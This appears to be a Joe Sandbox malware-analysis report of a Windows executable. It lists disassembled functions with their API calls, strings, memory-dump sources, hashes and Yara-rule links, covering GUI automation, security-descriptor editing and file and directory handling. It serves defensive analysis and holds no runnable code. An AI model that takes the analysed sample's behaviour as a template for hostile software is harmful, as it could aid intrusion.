                                                                                • Instruction ID: 8e3cada7451e698d5714d102b367975d37e950c8aca494fd6bb9618d2742c9bb
                                                                                • Opcode Fuzzy Hash: cfb3c696f6b5f99e4c748fde186aa8ccb5626cd47e1b4fb5fc0b286cabdc9a4b
                                                                                • Instruction Fuzzy Hash: 0DD1F3B1A00909DBCF269F65D885BB9B7B9FF04700F258095E609DF690DB74EC40DBA2
                                                                                Function 0041716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 004171FC
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00417247
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 3974292440-4258414348
                                                                                • Opcode ID: c8d2f65daa75816239579302aaaa35c873a52766a233d0db5bbdc61259a97898
                                                                                • Instruction ID: d2e4180785392da5f7cc79c11513373b7f26258e073dee1303279b7479a9d93b
                                                                                • Opcode Fuzzy Hash: c8d2f65daa75816239579302aaaa35c873a52766a233d0db5bbdc61259a97898
                                                                                • Instruction Fuzzy Hash: BF9141742087019BCB05EF10C451AAEB7A1BF94314F14885EF9965B7A3DB38FD4ACB86
                                                                                Function 003ECB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnumChildWindows.USER32(?,003ECF50), ref: 003ECE90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumWindows
                                                                                • String ID: 4+F$CLASS$CLASSNN$H+F$INSTANCE$L+F$NAME$P+F$REGEXPCLASS$T+F$TEXT
                                                                                • API String ID: 3555792229-1435497875
                                                                                • Opcode ID: f1214702af29c3260052cdc902345476fb25b66a4e1a96e189c6dd7a2ac3f137
                                                                                • Instruction ID: f22da0ead6af014f194f9d4a8651f28b56947019e6381eb50bf16a802472ab92
                                                                                • Opcode Fuzzy Hash: f1214702af29c3260052cdc902345476fb25b66a4e1a96e189c6dd7a2ac3f137
                                                                                • Instruction Fuzzy Hash: 4091B230610696ABCB1ADF61C482BEEFB74FF44300F50961AD959AB191DF30B95ACB90
                                                                                Function 0041E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0041E5AB
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0041BEAF), ref: 0041E607
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041E647
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041E68C
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041E6C3
                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0041BEAF), ref: 0041E6CF
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0041E6DF
                                                                                • DestroyIcon.USER32(?,?,?,?,?,0041BEAF), ref: 0041E6EE
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0041E70B
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0041E717
                                                                                  • Part of subcall function 003D0FA7: __wcsicmp_l.LIBCMT ref: 003D1030
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 1212759294-1154884017
                                                                                • Opcode ID: 963731bd3a087a7f21def20489e0ea521d62c7ba0020d71e8bf85650709fc8ad
                                                                                • Instruction ID: 3f38243b454e78c416424d2d6d266fd6a8bf4fdc255ebffee638b812a1eb92e4
                                                                                • Opcode Fuzzy Hash: 963731bd3a087a7f21def20489e0ea521d62c7ba0020d71e8bf85650709fc8ad
                                                                                • Instruction Fuzzy Hash: 4661F371900215FAEB14DF65DC42FFE7BA8BB18B24F504116F911EA1D0EB78E980CB68
                                                                                Function 003FD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • CharLowerBuffW.USER32(?,?), ref: 003FD292
                                                                                • GetDriveTypeW.KERNEL32 ref: 003FD2DF
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FD327
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FD35E
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FD38C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 1148790751-4113822522
                                                                                • Opcode ID: bdc867782381a09386211ff1f808f374b1f290ff823c28375e91958bdba67669
                                                                                • Instruction ID: b09f4f83cd3c3a9f7848771aebcefae98744244b47166e5272c2928613aefc33
                                                                                • Opcode Fuzzy Hash: bdc867782381a09386211ff1f808f374b1f290ff823c28375e91958bdba67669
                                                                                • Instruction Fuzzy Hash: 70514B755043059FC701EF10C881AAEB7F9EF98718F10886DF995AB2A1DB31EE05CB82
                                                                                Function 003F26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00423973,00000016,0000138C,00000016,?,00000016,0044DDB4,00000000,?), ref: 003F26F1
                                                                                • LoadStringW.USER32(00000000,?,00423973,00000016), ref: 003F26FA
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00423973,00000016,0000138C,00000016,?,00000016,0044DDB4,00000000,?,00000016), ref: 003F271C
                                                                                • LoadStringW.USER32(00000000,?,00423973,00000016), ref: 003F271F
                                                                                • __swprintf.LIBCMT ref: 003F276F
                                                                                • __swprintf.LIBCMT ref: 003F2780
                                                                                • _wprintf.LIBCMT ref: 003F2829
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003F2840
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 618562835-2268648507
                                                                                • Opcode ID: dddb2e5e4816e3e3a9bf40aef8fd3bdca5c1d5edd18262a4e531ca4e40f48081
                                                                                • Instruction ID: 2e9d090220bc7d471b898a1cb0e4adb0a4029e643ef6f62e87c31657c209b3d5
                                                                                • Opcode Fuzzy Hash: dddb2e5e4816e3e3a9bf40aef8fd3bdca5c1d5edd18262a4e531ca4e40f48081
                                                                                • Instruction Fuzzy Hash: 89413C72800219BACF16FBE0DE86EEFB778AF14344F100065F6057A492EA746F49CB61
                                                                                Function 003FD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003FD0D8
                                                                                • __swprintf.LIBCMT ref: 003FD0FA
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 003FD137
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003FD15C
                                                                                • _memset.LIBCMT ref: 003FD17B
                                                                                • _wcsncpy.LIBCMT ref: 003FD1B7
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003FD1EC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 003FD1F7
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 003FD200
                                                                                • CloseHandle.KERNEL32(00000000), ref: 003FD20A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 2733774712-3457252023
                                                                                • Opcode ID: 2efdea3757a6ac589f92c090bf3d52873e2f7ced126be3c5545426df31c4d745
                                                                                • Instruction ID: c0d309946639f9fef99b6ecc91b5fbfa4ca323aa6cbe052f37e5062189440180
                                                                                • Opcode Fuzzy Hash: 2efdea3757a6ac589f92c090bf3d52873e2f7ced126be3c5545426df31c4d745
                                                                                • Instruction Fuzzy Hash: D631AFB2900109ABDB22DFA0EC49FEB77BDEF89700F1040B6FA09D6160E770D6448B24
                                                                                Function 0041E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0041BEF4,?,?), ref: 0041E754
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E76B
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E776
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E783
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0041E78C
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E79B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041E7A4
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E7AB
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E7BC
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0043D9BC,?), ref: 0041E7D5
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0041E7E5
                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0041E809
                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0041E834
                                                                                • DeleteObject.GDI32(00000000), ref: 0041E85C
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0041E872
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: 27bb1bb2f1e53f69dd0f02dfde591ba242b7ee8fc3d909cde337533dd3507df0
                                                                                • Instruction ID: 188350257d0cc722ec8289b39a9b994d647a203b3a82e7a6d0fbf729e39f86ca
                                                                                • Opcode Fuzzy Hash: 27bb1bb2f1e53f69dd0f02dfde591ba242b7ee8fc3d909cde337533dd3507df0
                                                                                • Instruction Fuzzy Hash: FE413B75A00204FFDB11AF65EC88EAB7BB8EF89715F104069F916D72A0D7349D41DB24
                                                                                Function 004005F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __wsplitpath.LIBCMT ref: 0040076F
                                                                                • _wcscat.LIBCMT ref: 00400787
                                                                                • _wcscat.LIBCMT ref: 00400799
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004007AE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004007C2
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 004007DA
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 004007F4
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00400806
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                • String ID: *.*
                                                                                • API String ID: 34673085-438819550
                                                                                • Opcode ID: 7857aaeaf04a4f4df38dd0c9fd16863883f3b9a8441652213014440b694806f1
                                                                                • Instruction ID: e3d2bae9049f143a96d7d059acde0a0e589d8919e675b977b34c9dfcfcb5f3a7
                                                                                • Opcode Fuzzy Hash: 7857aaeaf04a4f4df38dd0c9fd16863883f3b9a8441652213014440b694806f1
                                                                                • Instruction Fuzzy Hash: 3A8180725042419FCB24EF24C445A6FB7E9BB88304F148C3FF889EB391EA39D9558B56
                                                                                Function 0041EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0041EF3B
                                                                                • GetFocus.USER32 ref: 0041EF4B
                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0041EF56
                                                                                • _memset.LIBCMT ref: 0041F081
                                                                                • GetMenuItemInfoW.USER32 ref: 0041F0AC
                                                                                • GetMenuItemCount.USER32(00000000), ref: 0041F0CC
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0041F0DF
                                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0041F113
                                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0041F15B
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0041F193
                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0041F1C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1296962147-4108050209
                                                                                • Opcode ID: e8c71851e98ab1d87c4a3a47b1fd1f7afa513a621ffc1478a096bbe8ab0b0517
                                                                                • Instruction ID: 9a28ae65580b57a4d4b393ca2fc57f53acebce17472ec8a6acff2814a0bc9369
                                                                                • Opcode Fuzzy Hash: e8c71851e98ab1d87c4a3a47b1fd1f7afa513a621ffc1478a096bbe8ab0b0517
                                                                                • Instruction Fuzzy Hash: 63819B71508301EFD710CF15D884AABBBE9FB88714F00452EF99897291D734DC8ACB9A
                                                                                Function 003EA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003EABD7
                                                                                  • Part of subcall function 003EABBB: GetLastError.KERNEL32(?,003EA69F,?,?,?), ref: 003EABE1
                                                                                  • Part of subcall function 003EABBB: GetProcessHeap.KERNEL32(00000008,?,?,003EA69F,?,?,?), ref: 003EABF0
                                                                                  • Part of subcall function 003EABBB: HeapAlloc.KERNEL32(00000000,?,003EA69F,?,?,?), ref: 003EABF7
                                                                                  • Part of subcall function 003EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003EAC0E
                                                                                  • Part of subcall function 003EAC56: GetProcessHeap.KERNEL32(00000008,003EA6B5,00000000,00000000,?,003EA6B5,?), ref: 003EAC62
                                                                                  • Part of subcall function 003EAC56: HeapAlloc.KERNEL32(00000000,?,003EA6B5,?), ref: 003EAC69
                                                                                  • Part of subcall function 003EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003EA6B5,?), ref: 003EAC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003EA8CB
                                                                                • _memset.LIBCMT ref: 003EA8E0
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003EA8FF
                                                                                • GetLengthSid.ADVAPI32(?), ref: 003EA910
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 003EA94D
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003EA969
                                                                                • GetLengthSid.ADVAPI32(?), ref: 003EA986
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003EA995
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 003EA99C
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003EA9BD
                                                                                • CopySid.ADVAPI32(00000000), ref: 003EA9C4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003EA9F5
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003EAA1B
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003EAA2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: 39b4f0bfbea7f71f1cad108f473961e2539fc3ddbe16753966e75a5ff4800dd8
                                                                                • Instruction ID: 40a2b6875399030ccad9ae238373dccda89fe33a5c9fcc44cf6e08f416eb21cc
                                                                                • Opcode Fuzzy Hash: 39b4f0bfbea7f71f1cad108f473961e2539fc3ddbe16753966e75a5ff4800dd8
                                                                                • Instruction Fuzzy Hash: 47518071900659AFDF05CFA1DD85EEEBB7AFF04304F048229F811AB290D730AA05CB61
                                                                                Function 00409DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00409E36
                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00409E42
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00409E4E
                                                                                • SelectObject.GDI32(00000000,?), ref: 00409E5B
                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00409EAF
                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00409EEB
                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00409F0F
                                                                                • SelectObject.GDI32(00000006,?), ref: 00409F17
                                                                                • DeleteObject.GDI32(?), ref: 00409F20
                                                                                • DeleteDC.GDI32(00000006), ref: 00409F27
                                                                                • ReleaseDC.USER32(00000000,?), ref: 00409F32
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: cb2b0105e26507291d1567dee90a7f1529984047ee8c4257119bcbb81f09f6d8
                                                                                • Instruction ID: 2d9060d67c7aa44875013a13a5c12ebb68b72243c59b8ca06621b8a2bf592c4e
                                                                                • Opcode Fuzzy Hash: cb2b0105e26507291d1567dee90a7f1529984047ee8c4257119bcbb81f09f6d8
                                                                                • Instruction Fuzzy Hash: 6D514771900209AFCB15CFA8D885EAFBBB9EF48710F14842EF95AA7250C735AC41CB94
                                                                                Function 003FCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString__swprintf_wprintf
